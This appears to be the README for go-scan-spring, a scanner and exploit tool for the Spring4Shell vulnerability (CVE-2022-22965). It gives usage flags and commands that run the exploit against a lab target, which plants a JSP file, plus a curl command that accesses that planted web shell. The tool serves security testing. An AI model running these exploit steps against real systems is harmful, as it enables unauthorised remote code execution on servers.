go-scan-spring

Vulnerability scanner to find Spring4Shell (CVE-2022-22965) vulnerabilities

For more information: https://www.fracturelabs.com/posts/effective-spring4shell-scanning-exploitation/

@fracturelabs @brkr19

Build

[~/opt] $ git clone https://github.com/fracturelabs/go-scan-spring.git
[~/opt] $ cd go-scan-spring

Usage

Help

[~/opt/go-scan-spring] $ go run main.go help scan

Run a scan against target URLs looking for vulnerable services

Usage:
  go-scan-spring scan [flags]

Flags:
  -f, --file string         Target URL filename (- for stdin)
      --follow-redirect     Follow redirects
  -h, --help                help for scan
      --http-get            Test using HTTP GET requests (must set =false to disable) (default true)
      --http-post           Test using HTTP POST requests (must set =false to disable) (default true)
      --identifier string   Unique scan identifier (used as a password and an exploit filename) (default "go-scan-spring")
  -x, --proxy string        Upstream proxy
      --run-baseline        Run a baseline test to see if endpoint is up
      --run-exploit         Run an exploit to retrieve the owner of the Tomcat process
      --run-safe            Run a safe test to see if endpoint is vulnerable
  -s, --sleep int           Time to sleep between exploit steps. This is needed to allow time for deployment. (default 10)
  -t, --threads int         Number of threads (default 5)

Global Flags:
      --debug   enable debug logging

Basic safe scan

[~/opt/go-scan-spring] $ go run main.go scan --run-safe -f urls.txt

Basic safe exploit

Use your own unique identifier parameter!

# Using HTTP GETs and POSTs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit

# Using only HTTP GETs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit --http-post=false

# Using only HTTP POSTs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit --http-get=false

Verification

You can verify the script works properly by testing against an intentionally vulnerable system, such as spring4shell_victim

[~] $ curl --output - 'http://localhost:8080/go-scan-spring/550bafe0-0c6c-4f3e-a46b-0901c28e690b-AD.jsp?pwd=550bafe0-0c6c-4f3e-a46b-0901c28e690b'

Credits

  • The entire structure and several functions were borrowed heavily from the wonderful GoWitness project from SensePost.
  • The safe check implemented in this was inspired by The Randori Attack Team and Zach Grace
  • Whoever created the first PoC – stuff is moving too fast to properly attribute this right now!

GitHub

View Github